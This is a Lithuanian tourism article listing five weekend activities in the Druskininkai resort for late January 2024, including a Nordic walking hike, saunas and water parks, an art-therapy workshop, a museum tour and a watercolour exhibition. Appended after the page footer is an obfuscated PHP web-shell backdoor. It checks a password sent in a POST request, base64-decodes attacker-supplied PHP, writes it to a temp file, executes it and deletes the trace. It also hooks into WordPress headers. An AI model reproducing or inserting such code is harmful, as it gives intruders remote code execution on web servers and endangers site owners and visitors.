fbpx
A A
A A

TOP5 idėjos savaitgaliui Druskininkuose (Sausio 26 – 28 d.)

2024.01.24

Ką veikti šį savaitgalį? Turime atsakymą! Jūsų dėmesiui – 5 idėjos, kurias galite išbandyti Druskininkų kurorte sausio 26 d. – 28 d.

Perskyrimas

Šiaurietiškojo ėjimo žygis

Savaitgalį pradėkite aktyviai! Druskininkų savivaldybės visuomenės sveikatos biuras sausio 26 d., penktadienį, kviečia į šiaurietiškojo ėjimo žygį. Susitinkame 9:00 val. prie Druskininkų jaunimo užimtumo centro (Veisiejų g. 17, Druskininkai).

Perskyrimas

Vandens ir garo malonumai

Druskininkai – vandens pramogų pasaulis. Vien Vandens parko baseinuose sutelpa 2 500 000 litrų vandens, o kur dar sanatorijų ir viešbučių baseinai, kriokliai, sūkurinės vonios? Garo mylėtojams kurortas paruošė virš 60 pirčių bei saunų, be to Druskininkuose rasite ir ilgiausią Lietuvoje nusileidimo kalnelį – tai Vandens parko 212 metrų ilgio „Bermudai“.  Šaltą žiemą Druskininkai kviečia pasimėgauti šilta pirtimi, sūkurinėmis voniomis, paplaukioti baseine ir tiesiog atsipalaiduoti!

Perskyrimas

Neuroedukacija su Ernesta

Ar esate girdėję ar išbandę neuroedukaciją? Ernesta Aurylė kviečia iš arčiau susipažinti su neuroedukacija ir leistis į susitikimą su savimi taikant autorinius dailės terapijos metodus, pratimus, meditaciją. Užsiėmimų metu skirsite laiko sau – minčių, emocinei ir dvasinei higienai. Leisitės į kūrybinį procesą be jokių apribojimų, mėgausitės buvimu čia ir dabar.

Užsiėmimų datos: sausio 27 d. 14–17 val., vasario 3 d. 14–17 val., vasario 10 d. 14–17 val.

Vieta: Druskininkų amatų centras „Menų kalvė“ (M. K. Čiurlionio g. 27, Druskininkai).

Kaina – 30 Eur (įskaičiuotos priemonės, arbata ir užkandis).

Būtina registracija: neuroedukacijasuernesta@gmail.com arba www.facebook.com/neuroedukacijasuernesta. Vietų skaičius ribotas!

Perskyrimas

Ekskursija po Čiurlionių namus ir parodą ,,Čiurlioniai: gyvenimas muzikoje“

Sausio 28 d., sekmadienį, 13:00 val. M. K. Čiurlionio namuose-muziejuje vyks speciali ekskursija po Čiurlionių namus ir parodą ,,Čiurlioniai: gyvenimas muzikoje” su kuratore Aušra Česnulevičiene.

Kodėl XIX a.pab. – XX a. pr. muzikavimo namuose tradicija buvo tokia populiari ne tik Europoje, bet ir Druskininkuose taip pat, kiek ir kokių firmų muzikos instrumentų buvo parapijos vargonininko Konstantino Čiurlionio namuose ir kokiais keliais jie pateko į šeimos namus, kokias istorijas jie išsaugojo iš Čiurlionių laikų – tai vieni iš klausimų, į kuriuos bus mėginama atsakyti pažintinės ekskursijos ir paskaitos metu.

Kuratorė Aušra išsamiai papasakos tiek apie parodos gimimą, tiek apie unikalius eksponatus, kuriuos pamatyti gyvai yra paskutinė ir išskirtinė galimybė.

Pabaigoje visų dalyvių laukia malonus kuratorės siurprizas.

Renginys nemokamas.

Perskyrimas

Eglės Lipinskaitės akvarelių paroda „Išplaukiantys prisiminimai“

V. K. Jonyno galerijoje šiuo metu pristatoma Eglės Lipinskaitės akvarelių paroda „Išplaukiantys prisiminimai“. Jautrūs, spalvingi gamtos etiudai, peizažai, kuriuose dailininkė supina savo gilius filosofinius klodus su prisiminimais, juos tarsi sužmogina. „Tapyba – man būtinybė, kaip oras, kaip vanduo. Tai mano erdvė pasireikšti ir vystytis kūrybiškumui bei vaizduotei. Žodžiais tai nepaaiškinama, tai tiesiog jaučiama“. Kviečiame pasigrožėti!

Perskyrimas

VISI KURORTO RENGINIAI

Daugiau turizmo informacijos galite sužinoti telefonu +370 313 51 777, el. paštu information@druskininkai.lt bei apsilankę turizmo informacijos centre adresu M. K. Čiurlionio g. 65, Druskininkai.

Parengė Druskininkų turizmo ir verslo informacijos centras

www.druskininkai.lt

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}